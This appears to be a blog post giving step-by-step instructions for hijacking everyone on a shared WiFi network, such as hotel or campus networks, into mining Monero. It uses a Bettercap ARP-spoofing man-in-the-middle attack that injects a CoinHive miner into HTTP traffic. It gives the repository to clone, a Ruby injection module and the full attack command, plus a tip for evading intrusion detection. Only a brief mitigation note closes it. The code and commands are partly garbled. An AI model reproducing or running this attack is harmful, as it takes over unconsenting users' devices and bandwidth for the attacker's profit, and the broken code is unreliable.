Force an entire network to mine #Monero, with #Bettercap and a single command.

in #cryptocurrency7 years ago

Previously i posted about using the #CoffeeMiner tool to perform self hosted variants of #CoinHive to bypass attempts at stopping it and using an #MiTM attack to force other network users into mining #Monero for you.

One or two people have mentioned this is a little bit much to setup on the fly with all locations being different etc. So at a trade of i checked the latest version of bettercap proxy modules. Someone has already gone an written a proxy plugin to silently inject CoinHive and your key into the HTML header. All that is now required is below in a highly effective attack, combined with the ebay_passive_income module this could be nice for a hostel or hotel or any business that provides free WiFi to generate some extra revenue but there are ethical questions to be asked however you could limit the process to run without tampering with SSL via a transparent proxy such as squid or even with bettercap itself

Open a terminal and pull down the bettercap-proxy-modules git

get clone https://github.com/evilsocket/bettercap-proxy-modules.git

Below is the code being used in the makemoney.rb modules which just pulls down the coin.js and then appends a few variables to it including your key before injecting. See below


@@coinkey = nil
ef self.on_options(opts)
opts.on( '--coin-key KEY', 'Your site key on coinhive.' ) do |v|
@@coinkey = v
end
end
@loadcoinhive = CoinHive.js
@jscontent = var miner = new CoinHive.Anonymous('#{@@coinkey}'); miner.start();
@jsfile = "#{@loadcoinhive}#{@jscontent}"

Once you have the git hub pulled you can simply switch to the folder containing them and connect to you're free WFi at a hotel or on campus, ...) and run this command


: ~># bettercap -X -S ARP --proxy --proxy-module Scripts/makemoney.rb --coin-key "YOUR_KEY_HERE"

And Bettercap will begin to silently inject your miner into all HTTP traffic as it is transparently proxied through our attack machine during the MiTM. So add more steal you could add --no-sslstrip to the command to try to avoid IDS systems and user disruption.

To mitigrate this type of attack remember to install things like HTTPSEverywhere and NoScript in your browser to control script execution in your browser and ensure secure browsing. Furthermore look if its possible to enable Client Isolation in your internet gateway or router.

#bitcoin #ethereum #infosec #crypto
7 years ago in #cryptocurrency by
$0.02
  • Past Payouts $0.02
  • - Author $0.02
  • - Curators $0.00
5 votes
Reply 0